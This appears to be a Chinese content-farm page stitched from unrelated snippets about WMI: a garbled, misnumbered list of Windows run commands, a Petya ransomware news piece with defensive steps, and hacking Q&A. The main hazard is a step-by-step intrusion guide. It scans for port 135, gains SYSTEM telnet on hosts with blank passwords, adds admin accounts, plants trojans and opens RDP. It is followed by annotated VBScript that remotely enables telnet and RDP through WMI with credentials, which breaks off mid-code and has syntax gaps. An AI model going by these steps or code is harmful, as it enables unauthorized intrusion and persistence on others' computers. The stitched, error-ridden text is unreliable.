wmi黑客的简单介绍

第三方分享代码

hacker 2年前 (2023-03-14) 黑客软件 143 1

目录介绍：

1、命令有哪些黑客CMD Ping命令大全
2、威胁升级！新一轮勒索病毒来袭！
3、本人电脑的事件查看器\windows日志\应用程序里面一直有一个错误，每次开机都有，这个错误来源WMI
4、c盘里的wmi文件能删不
5、黑客如何通过ip放病毒
6、100分问题！！！C#里要用WMI获取系统信息，请问一个有几个ManagementClass？分别是什么？

命令有哪些黑客CMD Ping命令大全

1. gpedit.msc-----组策略

2. sndrec32-------录音机

3. Nslookup-------IP地址侦测器，是一个监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。

4. explorer-------打开资源管理器

5. logoff---------注销命令

6. shutdown-------60秒倒计时关机命令

7. lusrmgr.msc----本机用户和组

8. services.msc---本地服务设置

9. oobe/msoobe /a----检查XP是否激活

10. notepad--------打开记事本

11. cleanmgr-------垃圾整理

12. net start messenger----开始信使服务

13. compmgmt.msc---计算机管理

14. net stop messenger-----停止信使服务

15. conf-----------启动netmeeting

16. dvdplay--------DVD播放器

17. charmap--------启动字符映射表

18. diskmgmt.msc---磁盘管理实用程序

19. calc-----------启动计算器

20. dfrg.msc-------磁盘碎片整理程序

21. chkdsk.exe-----Chkdsk磁盘检查

22. devmgmt.msc--- 设备管理器

23. regsvr32 /u *.dll----停止dll文件运行

24. drwtsn32------ 系统医生

25. rononce -p----15秒关机

26. dxdiag---------检查DirectX信息

27. regedt32-------注册表编辑器

28. Msconfig.exe---系统配置实用程序

29. rsop.msc-------组策略结果集

30. mem.exe--------显示内存使用情况

31. regedit.exe----注册表

32. winchat--------XP自带局域网聊天

33. progman--------程序管理器

34. winmsd---------系统信息

35. perfmon.msc----计算机性能监测程序

36. winver---------检查Windows版本

37. sfc /scannow-----扫描错误并复原

38. taskmgr-----任务管理器（2000/xp/2003

40. wmimgmt.msc----打开windows管理体系结构(WMI)

41. wupdmgr--------windows更新程序

42. wscript--------windows脚本宿主设置

43. write----------写字板

45. wiaacmgr-------扫描仪和照相机向导

46. winchat--------XP自带局域网聊天

49. mplayer2-------简易widnows media player

50. mspaint--------画图板

51. mstsc----------远程桌面连接

53. magnify--------放大镜实用程序

54. mmc------------打开控制台

55. mobsync--------同步命令

57. iexpress-------木马捆绑工具，系统自带

58. fsmgmt.msc-----共享文件夹管理器

59. utilman--------辅助工具管理器

61. dcomcnfg-------打开系统组件服务

62. ddeshare-------打开DDE共享设置

110. osk------------打开屏幕键盘

111. odbcad32-------ODBC数据源管理器

112. oobe/msoobe /a----检查XP是否激活

68. ntbackup-------系统备份和还原

69. narrator-------屏幕“讲述人”

70. ntmsmgr.msc----移动存储管理器

71. ntmsoprq.msc---移动存储管理员操作请求

72. netstat -an----(TC)命令检查接口

73. syncapp--------创建一个公文包

74. sysedit--------系统配置编辑器

75. sigverif-------文件签名验证程序

76. ciadv.msc------索引服务程序

77. shrpubw--------创建共享文件夹

78. secpol.msc-----本地安全策略

79. syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

80. services.msc---本地服务设置

81. Sndvol32-------音量控制程序

82. sfc.exe--------系统文件检查器

83. sfc /scannow---windows文件保护

84. ciadv.msc------索引服务程序

85. tourstart------xp简介（安装完成后出现的漫游xp程序）

86. taskmgr--------任务管理器

87. eventvwr-------事件查看器

88. eudcedit-------造字程序

89. compmgmt.msc---计算机管理

90. packager-------对象包装程序

91. perfmon.msc----计算机性能监测程序

92. charmap--------启动字符映射表

93. cliconfg-------SQL SERVER 客户端网络实用程序

94. Clipbrd--------剪贴板查看器

95. conf-----------启动netmeeting

96. certmgr.msc----证书管理实用程序

97. regsvr32 /u *.dll----停止dll文件运行

98. regsvr32 /u zipfldr.dll------取消ZIP支持

99. cmd.exe--------CMD命令提示符

威胁升级！新一轮勒索病毒来袭！

提到今年5月刚刚席卷150多个国家的“WannaCry”勒索病毒，很多网友一定还心有余悸，当时大规模的校园网、局域网用户都曾不慎中招。

近日，代号为Petya的新一轮勒索病毒袭击了英国、乌克兰等多个国家，目前中国国内也已有用户中招。

Petya勒索病毒感染的电脑。腾讯安全反病毒实验室供图。

病毒加密硬盘，勒索比特币

新勒索病毒Petya不仅对文件进行加密，而且直接将整个硬盘加密、锁死，在出现以下界面并瘫痪后，其会自动向局域网内部的其它服务器及终端进行传播。

同时，用户的电脑开机后则会黑屏，并显示如下的勒索信↓

信中称，用户想要解锁，需要向黑客的账户转折合300美元的比特币。

根据比特币交易市场的公开数据显示，病毒爆发最初一小时就有10笔赎金付款，其“吸金”速度完全超越了WannaCry。

与之前病毒相比，威胁升级

专家称，这轮病毒足以与5月席卷全球的勒索病毒的攻击性相提并论。

而且与之相比，Petya勒索病毒变种的传播速度更快。

它不仅使用了NSA“永恒之蓝”等黑客武器攻击系统漏洞，还会利用“管理员共享”功能在内网自动渗透。

在欧洲国家重灾区，新病毒变种的传播速度达到每10分钟感染5000余台电脑，多家运营商、石油公司、零售商、机场、ATM机等企业和公共设施已大量沦陷，甚至乌克兰副总理的电脑也遭到感染。

来源：这里是美国

此外，Petya勒索病毒还在以下方面威胁程度升级：

1.感染并加密本地文件的病毒进行了更新，杀毒软件除非升级至最新版病毒库，否则无法查杀及阻止其加密本机文件系统；

2.Petya综合利用了“5.12WannaCry”及“6.23勒索病毒新变种”所利用的所有Windows系统漏洞，包括MS17-010(5.12WannaCry永恒之蓝勒索病毒)及CVE-2017-8543/CVE-2017-8464(6.23勒索病毒新变种)等补丁对应的多个系统漏洞进行传播。

3.本次新变异病毒（Petya）是直接将整个硬盘加密和锁死，用户重启后直接进入勒索界面，若不支付比特币将无法进入系统。

防止感染，立刻这样设置电脑

由于目前黑客用来接受转账的比特币账户已经被封，所以即使用户给黑客转账也不能解锁自己的电脑了。

所以，为了自己的电脑设备不受影响，可以按小新的方法设置电脑↓

一、下载修复补丁

黑客是利用微软Windows系统的新漏洞，开发出新变种的勒索病毒，并在过去几天向互联网展开了初步攻击。

在6月13日，微软就已经在官网上发布了新漏洞有关的补丁。

下载地址：请戳这里

操作指南：

先打开网页，会看到CVE-2017-8543、CVE-2017-8464，找到相应版本的补丁进行下载（目前XP、Window2003不受影响），并执行相应主机及个人电脑的补丁升级。

二.限制端口访问

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步

8、配置文件，全选，下一步

9、名称，可以任意输入，完成即可。

10.将第6步中的端口替换为135后，重复一次所有步骤。

三、停止服务器的WMI服务

WMI（Windows Management Instrumentation Windows 管理规范）是一项核心的 Windows 管理技术你可以通过如下方法停止：

1.在服务页面开启WMI服务。在开始-运行，输入services.msc，进入服务。

或者，在控制面板，查看方式选择大图标，选择管理工具，在管理工具中双击服务。

2.在服务页面，按W，找到WMI服务，找到后，双击，直接点击停止服务即可，如下图所示：

来源：360官方微博

四、更新杀毒软件

目前，市面上主流的杀毒软件与电脑保护软件均有插件或程序，可以绝大程度上保护电脑不受新型勒索病毒感染。

来源：360官方微博

来源：腾讯电脑管家截图

用户只需在软件内搜索Petya，或到其官网搜索修复工具即可。

五、提高用户安全意识

1.限制管理员权限。

Petya勒索病毒的运行需要管理员权限，企业网管可以通过严格审查限制管理员权限的方式减少攻击面，个人用户可以考虑使用非管理员权限的普通账号登陆进行日常操作。

2.关闭系统崩溃重启。

Petya勒索病毒的“发病”需要系统重启，因此想办法避免系统重启也能有效防御Petya并争取漏洞修补或者文件抢救时间。只要系统不重新启动引导，病毒就没有机会加密MFT主文件分区表，用户就有机会备份磁盘中的文件（微软官方教程）。

3.不要轻易点击不明附件。

尤其是rtf、doc等格式。

4.备份重要数据。

重要文件进行本地磁盘冷存储备份，以及云存储备份。

5.内网中存在使用相同账号、密码情况的机器请尽快修改密码，未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作。

来源：人民网（people_rmw）、中国新闻网（cns2012）、中国青年网、Microsoft官网、360官方微博、中国经济网等

wmi黑客的简单介绍

本人电脑的事件查看器\windows日志\应用程序里面一直有一个错误，每次开机都有，这个错误来源WMI

ibserver.exe这个程序是病毒程序，通过它，黑客可以控制你的电脑。

建议你到安全模式下杀毒。在注册表中找到ibserver.exe相关项目全部删除

c盘里的wmi文件能删不

不能删除。

WMI，是Windows 2K/XP管理系统的核心；对于其他的Win32操作系统，WMI是一个有用的插件。WMI以CIMOM为基础，CIMOM即公共信息模型对象管理器（Common Information Model Object Manager），是一个描述操作系统构成单元的对象数据库，为MMC和脚本程序提供了一个访问操作系统构成单元的公共接口。有了WMI，工具软件和脚本程序访问操作系统的不同部分时不需要使用不同的API；相反，操作系统的不同部分都可以插入WMI，如图所示，工具软件和脚本程序可以方便地读写WMI。

现在很多朋友仍然在使用管理员账号密码为空的系统，这样就为黑客制造了可乘之机，其中系统自带的WMI是最方便的入侵通道。WMI（Windows管理规范）作为一项Windows管理技术，方便用户对计算机进行远程管理。但是它的易用性也导致了系统的安全性大幅下降。让用户的电脑除了自己账号密码的保护外再没有什么安全保护措施。本期我们就向大家介绍“菜鸟”级的黑客都可以轻易利用的入侵通道——WMI（Windows管理规范）。

WMI是一项核心的Windows管理技术，WMI作为一种规范和基础结构，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特定日期和时间运行的进程；远程启动计算机；获得本地或远程计算机的已安装程序列表；查询本地或远程计算机的Windows事件日志等等。

黑客如何通过ip放病毒

每个人都有IP地址，你说的放病毒具体是什么意思呢？但我可以给你一个例子。

你可以扫描你局域网或外网的IP是否开启了135端口。具体入侵如下！！！

通过135端口入侵的方法如下：

1、通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。

2、得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。

3、获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM权限。

下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样，就这么轻松得到了一台。是不是很过瘾啊。

100分问题！！！C#里要用WMI获取系统信息，请问一个有几个ManagementClass？分别是什么？

我不知道你要的系统信息到底有哪些？有几个ManagementClass要看你要得到具体哪些具体信息，比如要想获得盘符就只需一个ManagementClass

这里是一个范例，或许对你有所帮助（附源码）

以下是相关资料

一：WMI基础知识

====================================================================================

WMI 最初于1998年作为一个附加组件与 Windows NT 4.0 Service Pack 4 一起发行，是内置在Windows 2000、 Windows XP和Windows Server 2003 系列操作系统中核心的管理支持技术。基于由 Distributed Management Task Force (DMTF) 所监督的业界标准，WMI是一种规范和基础结构，通过它可以访问、配置、管理和监视几乎所有的Windows资源。大多用户习惯于使用众多的图形化管理工具来管理Windows资源，在WMI之前这些工具都是通过 Win32应用程序编程接口(Application ProgrammingInterfaces，API)来访问和管理Windows资源的。只要你熟悉系统编程你就知道API有多么重要。但是大多数脚本语言都不能直接调用Win32 API，WMI的出现使得系统管理员可以通过一种简便的方法即利用常见的脚本语言实现常用的系统管理任务。

利用WMI需要和脚本如WSH和VBScript结合起来，可以实现的功能大家可以看微软的MSDN文档。

在编写我们自己的脚本之前，我们需要对WMI的体系结构有个基本的了解。如图一：(1.gif)

在WMI 体系结构中我们最需要关心的就是WMI提供程序，WMI提供程序在WMI和托管资源之间扮演着中间方的角色。提供程序代表使用者应用程序和脚本从WMI托管资源请求信息，并发送指令到WMI托管资源。下面是我们利用WMI编程经常要用到的WMI内置提供程序清单，以供编程参考。

1.Active Directory提供程序

链接库文件：dsprov.dll

命名空间：root\directory\ldap

作用：将Active Directory 对象映射到 WMI。

2.事件日志提供程序

链接库文件：ntevt.dll

命名空间：root\cimv2

作用：管理 Windows 事件日志，例如，读取、备份、清除、复制、删除、监视、重命名、压缩、解压缩和更改事件日志设置。

3.注册表提供程序

链接库文件：stdprov.dll

命名空间：root\default

作用：读取、写入、枚举、监视、创建、删除注册表项和值。

4.Win32 提供程序

链接库文件：cimwin32.dll

命名空间：root\cimv2

作用：提供关于计算机、磁盘、外围设备、文件、文件夹、文件系统、网络组件、操作系统、打印机、进程、安全性、服务、共享、SAM 用户及组，以及更多资源的信息。

5.Windows 安装程序提供程序

链接库文件：msiprov.dll

命名空间：root\cimv2

作用：提供对已安装软件信息的访问。

从上面可以看出在WMI中类（即内置提供程序）被分组到命名空间中，命名空间可以看成是一个组。比如，命名空间 root\cimv2 包括大部分表示通常与计算机和操作系统相关联的资源的类。在使用类的时候要说明类所在的命名空间。类由属性和方法构成。这是可视化编程中的两个重要的概念。属性描述的是对象的状态，方法是对象可以执行的操作。

理论知识学起来很枯燥，下面让我们边分析高手的脚本源码边进行理论知识的巩固吧。

二：解析RTCS.VBS主要代码

=====================================================================================

有时候阅读别人的源码未尝不是一个好而且快捷的办法，下面就让我们来认真学习zzzEVAzzz编写的一个可以远程开启telnet服务的脚本RTCS.VBS。

该脚本可以直接访问目标的WMI,不依赖于目标的ipc$,实现远程开启/关闭目标telnet服务，为了方便大家学习我抽出了最主要的代码，具体分析如下：

set objlocator=createobject("wbemscripting.swbemlocator")

//创建WbemScripting.SwbemLocator对象(脚本接口)。

//可以看出WMI其实就是把Com组件WbemScripting.SWbemLocator封装起来罢了。

set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)

//通过ConnectServer函数请求连接到WMI控件服务上，root/default为命名空间。

set objinstance=objswbemservices.get("stdregprov")

//建立访问注册表的实例。

set objmethod=objinstance.methods_("SetDWORDvalue")

//建立可以更改注册表键值的方法。

set objinparam=objmethod.inparameters.spawninstance_()

//MethodData.InParameters用于获取或设置方法的输入参数。这里用spawninstance方法为它建立一个子实例，下面就可以将参数值赋予这个对象的属性。

objinparam.hdefkey=h80000002

//hdefkey表示根键，根键的十六制值如下：

//HKEY_CLASSES_ROOT (H80000000)

//HKEY_CURRENT_USER (H80000001)

//HKEY_LOCAL_MACHINE (H80000002)

//HKEY_USERS (H80000003)

//HKEY_CURRENT_CONFIG (H80000005)

objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"

//ssubkeyname表示子键。

objinparam.svaluename="NTLM"

//svaluename表示属性名。

objinparam.uvalue=ntlm

//uvalue表示键值。

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

//利用execmethod执行方法，这里才真正改写了注册表。

//下面是修改telnet服务的TelnetPort值，原理同上。

objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

修改telnet的注册表部分就完成了，将NTLM和TelnetPort进行了修改，要是对方的telnet服务没有开启呢？下面就需要根据telnet的具体情况，来启动telnet服务，继续看代码。

//首先查询远程主机上tlntsvr的启动方式。

set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)

//win32_service类在root\cimv2命名空间中，作用没忘记吧？快看基础知识呵。

set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")

//注意：查询都是通过枚举来实现的。

for each objinstance in colinstances

if objinstance.startmode="Disabled" then

set objmethod=objinstance.methods_("changestartmode")

//创建changestartmode方法来改变tlntsvr的启动方式。

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

//将启动方式改为手动方式。

set objoutparam=objinstance.execmethod_("changestartmode",objinparam)

end if

//下面启动我们的telnet服务。这里zzzEVAzzz的思路好象有点不对，也不知道是不是他的疏忽，我个人认为当telnet服务已经启动时不应该用stopservice方法停止服务。

if objinstance.started=true then

intstatus=objinstance.stopservice()

//stopservice是WMI中用于停止服务实例的服务的方法。

else

intstatus=objinstance.startservice()

end if

三：手把手教你编写WMI版本的ROTS.vbs来开启3389

=====================================================================================

zzzVEAzzz 的脚本就分析到这里吧，怎么样？很EASY吧？！我相信大家现在一定蠢蠢欲动了？:)好，一起来写一个什么程序呢？ROTS.vbs我想大家一定都用过吧？什么东东啊？我……砸!大家应该知道这个ROTS是有它的使用条件的，不仅要有管理员帐号，还要允许进行ipc连接，在这个到处都是墙的年代，ipc 早就不实用了，而且ROTS.vbs早就被查杀了，那该怎么办？当然是自己动手了。能不能实现ROTS的一样的远程开启3389的功能而不受ipc的限制呢？答案自从我写了这篇文章后成为肯定的，哈哈，吹吹了。

当然我们也是要求系统至少是2000server及以上的，最近看到有个软件可以给2000pro开3389，由于比较忙，也没怎么去理它，这里我们暂且不说它，知道了原理一样好办。

开启3389有个注册表导入的方法，其它一些软件的开法，我想也大多是通过修改注册表实现的。这个方法需要导入如下的注册表：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

"Hotkey"="1"

原理知道了就没什么难的了，先理清我们的思路，我们的主要任务是更改注册表里的键值。首先是创建WMI对象，然后是连接到远程WMI服务器，最后修改注册表键值。

部分主要代码如下（完整的代码和详细的注释请看附带的软件包）

on error resume next

//防止出现意外。

set outstreem=wscript.stdout

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "chr(34)wscript.scriptfullnamechr(34))

//cmd后带/K参数表示执行字符串指定的命令。

wscript.quit

end if

//进行简单的检查。

if wscript.arguments.count3 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if

//取出参数，分别赋予几个变量。

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

option=wscript.arguments(3)

usage()

下面是核心代码，也是实现远程修改注册表的功能，我这里给出另外一种实现的方式，对照前面的代码很容易理解，我就只作简单的解释了。详细情况可以参阅MSDN文档中关于StdRegProv类的说明。

（）

const HKEY_LOCAL_MACHINE = H80000002

const HKEY_USERS=H80000003

strComputer = ipaddress

//获取wmi对象

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _

strComputer "\root\default:StdRegProv")

strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"

strValueName = "Enabled"

strValue=0